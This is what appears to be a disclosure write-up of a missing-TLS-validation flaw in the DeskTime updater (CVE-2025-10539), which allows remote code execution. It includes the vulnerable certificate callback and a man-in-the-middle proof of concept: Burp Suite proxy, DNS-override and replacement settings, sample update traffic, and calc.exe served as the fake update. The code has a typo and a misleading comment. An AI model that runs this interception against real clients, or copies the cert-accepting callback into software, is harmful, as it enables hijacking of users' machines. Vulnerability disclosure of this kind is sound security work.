# Vulnerability Summary: Missing TLS Certificate Validation leading to RCE (CVE-2025-10539) ## Vulnerability Overview **CVE-2025-10539**: Due to missing TLS certificate validation, an attacker can inject themselves into the network path between the client and the DeskTime update server, returning a malicious executable file in response to an update request, thereby achieving user-level code execution (RCE) on the client. ## Impact Scope - **Affected Version**: 1.3.671 (latest version at time of testing) - **Trigger Condition**: The updater runs automatically every hour, requiring no user interaction ## Remediation - **Fixed Version**: v1.3.674 - **Release Date**: 2026-04-28 - **Download URL**: https://desktime.com/download ## Proof of Concept (POC) ### 1. Certificate Validation Code Snippet ```csharp // Certificate validation private bool CheckCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) { if (sslPolicyErrors == SslPolicyErrors.None) return true; if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors) { // Check if the certificate is valid for the hostname if (chain.ChainStatus.Length == 1 && chain.ChainStatus[0].Status == X50ChainStatus.UntrustedRoot) return true; } return false; } ``` ### 2. Burp Suite Listener Settings ``` Redirect to host: desktime.com Redirect to port: 443 ☑ Force use of TLS ☑ Support invisible proxying (enable only if needed) ``` ### 3. Burp DNS Override Settings ``` Hostname: desktime.com IP Address: 127.0.0.1 ``` ### 4. Update Request Example ```http GET /api/v1/updates?version=1.3.671&os=windows&arch=x64&user_id=xxx HTTP/1.1 Host: desktime.com Accept-Encoding: gzip, deflate, br Connection: Close ``` ### 5. Update Response Example ```json { "version": "1.3.674", "url": "https://desktime.com/updates/win/update.exe" } ``` ### 6. Burp Replacement Rule ``` Match: "version":"1.3.671" Replace: "version":"1.3.674" ``` ### 7. Malicious Update File Replace `calc.exe` with the updater; it will execute automatically when the client checks for updates.